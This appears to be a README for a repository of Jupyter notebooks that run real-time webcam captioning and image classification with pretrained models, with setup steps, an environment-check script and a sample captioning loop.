Welcome to the realtime-vision-captioning repository. This project showcases computer vision tasks using pretrained models in Jupyter notebooks. It allows you to run a web application that captures images through your webcam and provides real-time captioning and classification.
To download the application, visit the repository's Releases page.
This repository contains:
- Jupyter notebooks with examples of computer vision tasks.
- Real-time webcam application that performs captioning and classification.
You will find detailed instructions for running the application and more information about each notebook.
To run this application, ensure your system meets the following requirements:
- Operating System: Windows 10, macOS, or a recent Linux distribution.
- Python version: 3.7 or higher.
- Web browser: Chrome, Firefox, or Safari for the best experience.
- RAM: 8 GB or more recommended.
- Webcam: required for the real-time application.
- Internet connection: required for downloading models and datasets.
Download the Application
- Go to the repository's Releases page.
- Find the latest release and click its download link.
Install Dependencies
After downloading, you may need to install some Python packages. Open a terminal (or command prompt) in the project folder and install the packages listed in the project's requirements file (conventionally named requirements.txt):
pip install -r requirements.txt
This command installs all the necessary libraries.
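After installation, you can confirm that your interpreter meets the Python 3.7+ requirement and that the main libraries can be found. The sketch below uses only the standard library. The module names in `REQUIRED_MODULES` (`cv2`, `transformers`, `torch`, `PIL`) are assumptions about what the notebooks import, not a list taken from this repository, so adjust them to match the actual requirements file.

```python
# Minimal environment check for the webcam captioning notebooks.
# ASSUMPTION: REQUIRED_MODULES is a hypothetical list; replace it with the
# packages from the project's actual requirements file.
import importlib.util
import sys

MIN_PYTHON = (3, 7)  # from the system requirements
REQUIRED_MODULES = ["cv2", "transformers", "torch", "PIL"]  # hypothetical


def python_ok(min_version=MIN_PYTHON):
    """Return True if the running interpreter is at least min_version."""
    return sys.version_info[:2] >= min_version


def missing_modules(names=REQUIRED_MODULES):
    """Return the module names that cannot be found on the import path."""
    return [name for name in names if importlib.util.find_spec(name) is None]


if __name__ == "__main__":
    print("Python", sys.version.split()[0], "OK" if python_ok() else "is too old")
    missing = missing_modules()
    if missing:
        print("Missing packages:", ", ".join(missing))
    else:
        print("All listed packages are installed.")
```

You can paste this into a notebook cell or save it as a script; if any packages are reported missing, rerun the install command.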
Running the Jupyter Notebook
- Open your terminal and navigate to the folder where you downloaded the notebook files.
- Launch Jupyter Notebook by running the command:
jupyter notebook
Your default web browser will open a new tab displaying the Jupyter interface.
Open the Real-Time Webcam Notebook
- In the Jupyter interface, find the real-time webcam notebook (a .ipynb file).
- Click on it to open.
Start the Application
- Follow the instructions within the notebook to set up your webcam.
- Execute the cells in the notebook to run the real-time captioning application.
The application provides the following features:
- Real-Time Captioning: Captures live video and generates descriptive captions.
- Image Classification: Classifies images using pretrained models.
- User-Friendly Interface: The application is designed to be simple to use.
- Pretrained Models: Uses pretrained models from Hugging Face.
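The notebook's own code is not reproduced here. As a rough illustration of how real-time captioning can keep up with a webcam, the following is a minimal sketch assuming hypothetical `read_frame` and `caption_frame` callables (they are not functions from this repository). Because a captioning model is usually much slower than the camera's frame rate, the sketch runs the model only on every Nth frame and reuses the most recent caption in between.

```python
# Minimal sketch of a real-time captioning loop (not this repository's code).
# ASSUMPTION: read_frame and caption_frame are hypothetical callables supplied
# by the caller, e.g. a webcam reader and a pretrained captioning model.
from typing import Any, Callable, Iterator, Optional, Tuple


def caption_stream(
    read_frame: Callable[[], Optional[Any]],
    caption_frame: Callable[[Any], str],
    every_n_frames: int = 10,
    max_frames: Optional[int] = None,
) -> Iterator[Tuple[int, str]]:
    """Yield (frame_index, caption) pairs for each frame read.

    The (slow) captioning model runs only on every `every_n_frames`-th frame;
    the frames in between reuse the most recent caption.
    """
    if every_n_frames < 1:
        raise ValueError("every_n_frames must be >= 1")
    caption = ""
    index = 0
    while max_frames is None or index < max_frames:
        frame = read_frame()
        if frame is None:  # camera closed or stream exhausted
            break
        if index % every_n_frames == 0:
            caption = caption_frame(frame)
        yield index, caption
        index += 1


if __name__ == "__main__":
    # Demo with stand-in functions instead of a real webcam and model.
    fake_frames = iter(range(5))
    stream = caption_stream(
        read_frame=lambda: next(fake_frames, None),
        caption_frame=lambda frame: f"caption for frame {frame}",
        every_n_frames=2,
    )
    for index, caption in stream:
        print(index, caption)
```

With real components, `read_frame` might wrap OpenCV's `cv2.VideoCapture(0)` and return `None` when `read()` reports failure, and `caption_frame` might convert the BGR frame to an RGB PIL image and pass it to a Hugging Face `pipeline("image-to-text")`. These choices are assumptions; the notebooks may be structured differently.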
The application can run on a laptop, as long as the laptop meets the system requirements listed above.
If you encounter an error, read the error message carefully. Common issues relate to missing packages; rerun the dependency installation command from the setup instructions to install them.
If you would like to contribute, feel free to fork the repository and submit a pull request with your improvements or fixes.
For any questions or issues, please open an issue on the GitHub repository. We will do our best to assist you.
This project is licensed under the MIT License. For more details, see the LICENSE file in this repository.
Remember to explore the potential of real-time captioning. Enjoy the experience!